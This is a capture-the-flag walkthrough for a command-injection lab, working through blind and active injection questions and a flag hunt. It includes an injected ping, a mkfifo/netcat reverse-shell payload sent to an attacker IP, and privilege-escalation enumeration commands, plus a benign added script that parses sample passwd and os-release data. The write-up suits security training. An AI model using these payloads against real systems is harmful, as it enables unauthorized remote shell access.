[Task 3] Blind Command Injection
1. Ping the box with 10 packets. What is this command (without IP address)?
Access the site
Prepare the attacker machine to listen for the incoming ping (ICMP on the VPN interface):
tcpdump ip proto \\icmp -i tun0
; ping -c 10 <attacker ip>
Back on the attacker machine: success!!!
2. Redirect the box’s Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?
I will get a reverse shell.
nc -lvp 1234
Reverse shell reference:
Reverse Shell Cheat Sheet
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Paste the command and submit.
Back on the listener, now I have a shell.
3. Enter “root” into the input and review the alert. What type of alert do you get?
4. Enter “www-data” into the input and review the alert. What type of alert do you get?
5. Enter your name into the input and review the alert. What type of alert do you get?
[Task 4] Active Command Injection
1. What strange text file is in the website root directory?
2. How many non-root/non-service/non-daemon users are there?
The answer is zero.
3. What user is this app running as?
4. What is the user’s shell set as?
5. What version of Ubuntu is running?
6. Print out the MOTD. What favorite beverage is shown?
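The Task 4 questions about users, shells and the OS version are all answered by parsing `/etc/passwd` and `/etc/os-release` on the box. The following is an added example, not part of the original walkthrough: shell functions that do that parsing, fed here with constructed sample file contents so the logic can be run and checked offline. On the live target you would pass `"$(cat /etc/passwd)"` and `"$(cat /etc/os-release)"` instead.

```shell
#!/bin/sh
# Added example (not from the original walkthrough). The two samples below
# are constructed test data, not the contents of the target box.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:Bob:/home/bob:/bin/bash'

OS_RELEASE_SAMPLE='NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
PRETTY_NAME="Ubuntu 18.04.3 LTS"'

# Question 2: count non-root/non-service/non-daemon users.
# On Debian/Ubuntu, human accounts start at UID 1000 (UID_MIN in
# /etc/login.defs); "nobody" is UID 65534 and must be excluded.
# $1 is the text of /etc/passwd.
count_regular_users() {
    printf '%s\n' "$1" | awk -F: '$3 >= 1000 && $3 != 65534 { n++ } END { print n + 0 }'
}

# Question 4: login shell of the account named in $2, from passwd text $1.
user_shell() {
    printf '%s\n' "$1" | awk -F: -v u="$2" '$1 == u { print $7 }'
}

# Question 5: the VERSION field of /etc/os-release ($1), quotes stripped.
os_version() {
    printf '%s\n' "$1" | awk -F= '$1 == "VERSION" { gsub(/"/, "", $2); print $2 }'
}

# Stand-alone run against the constructed samples.
echo "regular users: $(count_regular_users "$PASSWD_SAMPLE")"
echo "www-data shell: $(user_shell "$PASSWD_SAMPLE" www-data)"
echo "Ubuntu version: $(os_version "$OS_RELEASE_SAMPLE")"
```

Note that `www-data` has `nologin` as its shell in the sample, which is the normal hardening for a web server account; the walkthrough's answer to question 4 is whatever the real box reports, not this sample.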
[Task 5] Get The Flag!
1. Get the flag!
Spawn a proper TTY shell first:
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
After all of these, I'm hitting a wall. Looking at the hint may help.
No privesc!!! Maybe there's a hidden flag.
find / 2>/dev/null | grep -i "flag"